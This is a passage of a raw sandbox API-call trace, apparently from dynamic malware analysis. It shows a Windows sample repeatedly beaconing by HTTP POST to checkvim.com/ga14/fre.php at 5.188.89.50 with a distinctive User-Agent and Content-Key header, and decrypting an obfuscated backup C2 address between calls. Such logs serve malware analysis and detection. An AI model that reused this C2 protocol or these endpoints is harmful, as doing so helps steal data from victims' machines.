ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0329.326] GetProcessHeap () returned 0x840000 [0329.326] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0329.326] socket (af=2, type=1, protocol=6) returned 0x5b4 [0329.326] connect (s=0x5b4, name=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0329.393] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0329.398] GetProcessHeap () returned 0x840000 [0329.398] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0329.398] GetProcessHeap () returned 0x840000 [0329.398] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0329.399] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0329.400] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0329.400] GetProcessHeap () returned 0x840000 [0329.400] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0329.400] GetProcessHeap () returned 0x840000 [0329.400] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0329.400] GetProcessHeap () returned 0x840000 [0329.400] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7e8 [0329.400] GetProcessHeap () returned 0x840000 [0329.400] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0329.401] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0329.402] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0329.402] GetProcessHeap () returned 0x840000 [0329.402] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0329.402] GetProcessHeap () returned 0x840000 [0329.402] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0329.402] send (s=0x5b4, buf=0x873a58*, len=237, flags=0) returned 237 [0329.402] send (s=0x5b4, buf=0x87eb58*, len=159, flags=0) returned 159 [0329.402] GetProcessHeap () returned 0x840000 [0329.402] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0329.402] recv (in: s=0x5b4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0329.764] GetProcessHeap () returned 0x840000 [0329.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0329.764] GetProcessHeap () returned 0x840000 [0329.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0329.764] GetProcessHeap () returned 0x840000 [0329.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0329.764] GetProcessHeap () returned 0x840000 [0329.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0329.764] closesocket (s=0x5b4) returned 0 [0329.764] GetProcessHeap () returned 0x840000 [0329.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0329.764] GetProcessHeap () returned 0x840000 [0329.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0329.764] GetProcessHeap () returned 0x840000 [0329.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0329.764] GetProcessHeap () returned 0x840000 [0329.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871290 | out: hHeap=0x840000) returned 1 [0329.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x114c) returned 0x5b4 [0329.766] Sleep (dwMilliseconds=0xea60) [0329.770] GetProcessHeap () returned 0x840000 [0329.770] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0329.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.772] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0329.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.780] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0329.787] GetProcessHeap () returned 0x840000 [0329.787] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0329.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.788] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0329.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.789] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0329.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.790] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.790] GetProcessHeap () returned 0x840000 [0329.790] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0329.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.791] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0329.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.792] CryptDestroyKey (hKey=0x87e730) returned 1 [0329.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.793] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0329.793] GetProcessHeap () returned 0x840000 [0329.793] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0329.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.794] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0329.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.795] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0329.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.796] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0329.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.797] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0329.797] GetProcessHeap () returned 0x840000 [0329.797] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0329.797] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0329.797] GetProcessHeap () returned 0x840000 [0329.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0329.797] GetProcessHeap () returned 0x840000 [0329.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0329.797] GetProcessHeap () returned 0x840000 [0329.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0329.797] GetProcessHeap () returned 0x840000 [0329.797] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0329.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.798] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0329.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.805] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0329.811] GetProcessHeap () returned 0x840000 [0329.811] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0329.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.812] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0329.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.813] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0329.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.814] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.814] GetProcessHeap () returned 0x840000 [0329.814] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0329.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.815] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0329.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.816] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0329.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.817] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0329.817] GetProcessHeap () returned 0x840000 [0329.817] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0329.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.818] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0329.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.819] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0329.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.820] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0329.820] GetProcessHeap () returned 0x840000 [0329.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0329.820] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0329.826] GetProcessHeap () returned 0x840000 [0329.826] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0329.826] socket (af=2, type=1, protocol=6) returned 0x5b8 [0329.826] connect (s=0x5b8, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0329.894] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0329.894] GetProcessHeap () returned 0x840000 [0329.894] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0329.894] GetProcessHeap () returned 0x840000 [0329.894] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0329.894] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0329.895] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0329.895] GetProcessHeap () returned 0x840000 [0329.895] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0329.895] GetProcessHeap () returned 0x840000 [0329.896] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0329.896] GetProcessHeap () returned 0x840000 [0329.896] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0329.896] GetProcessHeap () returned 0x840000 [0329.896] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0329.896] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0329.897] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0329.897] GetProcessHeap () returned 0x840000 [0329.897] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0329.897] GetProcessHeap () returned 0x840000 [0329.897] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0329.897] send (s=0x5b8, buf=0x873a58*, len=237, flags=0) returned 237 [0329.898] send (s=0x5b8, buf=0x87eb58*, len=159, flags=0) returned 159 [0329.898] GetProcessHeap () returned 0x840000 [0329.898] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0329.898] recv (in: s=0x5b8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0330.264] GetProcessHeap () returned 0x840000 [0330.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0330.264] GetProcessHeap () returned 0x840000 [0330.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0330.264] GetProcessHeap () returned 0x840000 [0330.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0330.264] GetProcessHeap () returned 0x840000 [0330.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0330.264] closesocket (s=0x5b8) returned 0 [0330.264] GetProcessHeap () returned 0x840000 [0330.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0330.264] GetProcessHeap () returned 0x840000 [0330.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0330.264] GetProcessHeap () returned 0x840000 [0330.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0330.264] GetProcessHeap () returned 0x840000 [0330.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0330.264] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1014) returned 0x5b8 [0330.265] Sleep (dwMilliseconds=0xea60) [0330.271] GetProcessHeap () returned 0x840000 [0330.271] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0330.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.272] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0330.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.277] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0330.282] GetProcessHeap () returned 0x840000 [0330.282] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0330.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.283] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0330.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.284] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0330.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.285] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.285] GetProcessHeap () returned 0x840000 [0330.285] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0330.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.286] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0330.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.286] CryptDestroyKey (hKey=0x87e870) returned 1 [0330.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.287] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0330.287] GetProcessHeap () returned 0x840000 [0330.287] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0330.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.288] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0330.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.289] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0330.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.289] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0330.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.290] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0330.290] GetProcessHeap () returned 0x840000 [0330.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0330.290] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0330.290] GetProcessHeap () returned 0x840000 [0330.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0330.290] GetProcessHeap () returned 0x840000 [0330.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0330.290] GetProcessHeap () returned 0x840000 [0330.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0330.290] GetProcessHeap () returned 0x840000 [0330.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0330.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.291] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0330.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.304] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0330.312] GetProcessHeap () returned 0x840000 [0330.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0330.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.313] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0330.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.314] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0330.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.315] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.315] GetProcessHeap () returned 0x840000 [0330.315] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0330.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.315] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0330.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.316] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0330.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.317] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0330.317] GetProcessHeap () returned 0x840000 [0330.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0330.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.318] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0330.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.318] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0330.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.319] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0330.319] GetProcessHeap () returned 0x840000 [0330.319] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0330.319] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0330.322] GetProcessHeap () returned 0x840000 [0330.322] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0330.322] socket (af=2, type=1, protocol=6) returned 0x5bc [0330.322] connect (s=0x5bc, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0330.389] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0330.390] GetProcessHeap () returned 0x840000 [0330.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0330.390] GetProcessHeap () returned 0x840000 [0330.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0330.391] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0330.393] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0330.393] GetProcessHeap () returned 0x840000 [0330.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, 